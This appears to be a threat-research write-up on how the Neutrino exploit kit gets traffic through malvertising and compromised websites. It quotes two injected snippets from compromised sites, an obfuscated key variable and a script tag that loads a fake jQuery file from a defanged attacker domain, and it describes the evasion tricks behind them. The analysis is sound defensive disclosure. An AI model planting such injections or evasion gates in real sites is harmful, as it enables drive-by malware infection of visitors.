In the cybercrime landscape, Exploit Kits (EKs) are the tool of choice for infecting endpoints by exploiting software vulnerabilities. An EK is only as effective as the web traffic directed towards it, however, so traffic acquisition is a critical component of any EK operation.
There are two primary sources of traffic to an exploit kit:
- malvertising: malicious ad banners displayed on legitimate websites
- compromised websites: malicious code injected into legitimate sites (iframes, 302 redirects, etc.)
One of the most popular exploit kits at the moment, Neutrino EK, has several different gates (the redirection layers that sit between the traffic source and the EK landing page):
Compromised websites are injected with two different code snippets. The first is an inline variable:

<script>var MjUzNjI4OTU2Mw="Mjg\u0034MT\u0049wN\u006ak3\u004dw";</script>

The second is a fake jQuery file loaded from an attacker-controlled domain:

<script src="http://answerdash[.]tech/lib/assets/chosen.jquery.js"></script>

We noted that if you browsed to the fake jQuery file directly, you would be served a different (benign) copy.
The variable is in fact a key needed to decode the JS file. It could have been defined inside the script itself, but it is stored on the compromised site instead, which makes it harder for researchers who analyze the standalone JS file without the key parameter: the file retrieved on its own cannot be decoded.
Two last noteworthy points about this jQuery gate: heavy IP filtering is in place (one shot per residential IP) to prevent replays of the drive-by download attack, so a second visit from the same IP will not reproduce the infection chain, and the domains involved use newer TLDs (e.g. .tech, .press).
Indicators of Compromise:
Source code: pastebin.com/raw/8zqXBxhB